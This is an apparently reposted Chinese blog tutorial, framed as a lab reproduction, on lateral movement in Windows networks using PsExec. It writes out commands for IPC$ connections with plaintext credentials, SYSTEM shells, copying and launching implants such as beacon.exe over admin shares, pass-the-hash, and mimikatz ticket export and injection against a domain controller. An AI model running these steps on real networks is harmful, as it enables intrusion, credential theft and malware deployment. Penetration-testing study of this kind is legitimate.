码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透-【横向移动】PsExec工具远程命令执行横向移动


    【横向移动】PsExec工具远程命令执行横向移动

    文章目录

    • 【横向移动】PsExec工具远程命令执行横向移动
    • PsExec介绍
    • PsExec使用条件
    • PsExec常用参数
    • 实验复现
      • 4.1、IPC$下的psexec
        • 上传psexec
        • 建立IPC$连接
        • 返回交互的shell或者执行命令
        • 远程上线
      • 4.2、PTH下的psexecs
      • 4.3、PTT下的psexec
        • 上传psexec
        • 进行PTT攻击
        • 导出内存的票据
        • 清除内存中的票据
        • 将高权限的票据文件注入内存
        • 查看票据
        • 远程复制
        • 远程上线

    在这里插入图片描述

    PsExec介绍

    psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin 共享和 i p c 共享和ipc 共享和ipc (该共享默认开启,依赖于445端口)。

    但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。

    由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中

    下载地址:
    https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools 在这里插入图片描述

    PsExec使用条件

    1、具有正确的凭证(内存凭证、账号密码、账号NTLM Hash)
    2、能建立IPC链接(也就是需要通过smb认证的),且目标机器开启了共享(默认开启的),并且目标 共享中必须有admin$共享

    PsExec常用参数

    psexec \ip -u administrator -p admin cmd 进⼊半交互式shell
    PsExec -accepteula \192.168.108.101 -s cmd.exe 建立交互的shell
    psexec \ip - uadministrator -p admin -w c:\cmd 进⼊交互式shell,且c:\是⽬标机器的⼯作⽬录
    psexec \ip -u administrator -p admin whoami all 执行命令
    psexec \ip -u administrator -p admin -d c:\beacon.exe 执行文件
    psexec \ip -u administrator -p admin -h -d c:\beacon.exe UAC的⽤⼾权限执行文件

    实验复现

    4.1、IPC$下的psexec

    上传psexec

    在这里插入图片描述

    建立IPC$连接

    net use \192.168.41.150\ipc$ “Admin@123” /user:administrator
    在这里插入图片描述

    返回交互的shell或者执行命令

    psexec.exe -accepteula \192.168.41.150 -s cmd.exe 返回交互shell (必须是msf或者远程 到桌面CS不行)
    psexec.exe -accepteula \192.168.41.150 -s ipconfig 远程执行命令
    在这里插入图片描述
    在这里插入图片描述
    远程复制

    copy C:\Users\admin\Desktop\wanli.exe \192.168.41.150\C$

    在这里插入图片描述

    远程上线

    psexec.exe -accepteula \192.168.41.150 -h -d c:\wanli.exe
    在这里插入图片描述

    4.2、PTH下的psexecs

    找到登录的凭证在这里插入图片描述
    找到和扫描地址在这里插入图片描述
    进行psexec攻击上线在这里插入图片描述

    4.3、PTT下的psexec

    上传psexec

    在这里插入图片描述

    进行PTT攻击

    导出内存的票据

    mimikatz.exe “privilege::debug” “sekurlsa::tickets /export”

    在这里插入图片描述

    清除内存中的票据

    shell klist purge
    mimikatz kerberos::purge
    两个都是清除票据

    将高权限的票据文件注入内存

    mimikatz kerberos::ptt [0;998d7]-2-0-40e10000-Administrator@krbtgt-
    HACK.COM.kirbi

    查看票据

    shell klist
    mimikatz kerberos::tgt

    远程复制

    copy C:\Users\admin\Desktop\wanli.exe \dc.hack.com\C$

    在这里插入图片描述

    远程上线

    psexec.exe \dc.hack.com -h -d c:\wanli.exe

    在这里插入图片描述

  • 相关阅读:
    高并发与秒杀实战
    股票买卖问题I、II、III、IV、V、VI
    源码分析:tb-core 的作用
    java项目-第142期ssm美食推荐系统-ssm毕业设计_计算机毕业设计
    C++——list
    binlog格式设置
    轻取软考45分之软考信息系统项目管理师范围管理​章节学习笔记
    Vue3的watch使用介绍及场景
    Android开发基础——常用控件的使用方法
    运筹学动态规划矩阵连乘
  • 原文地址:https://blog.csdn.net/lza20001103/article/details/126645797
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号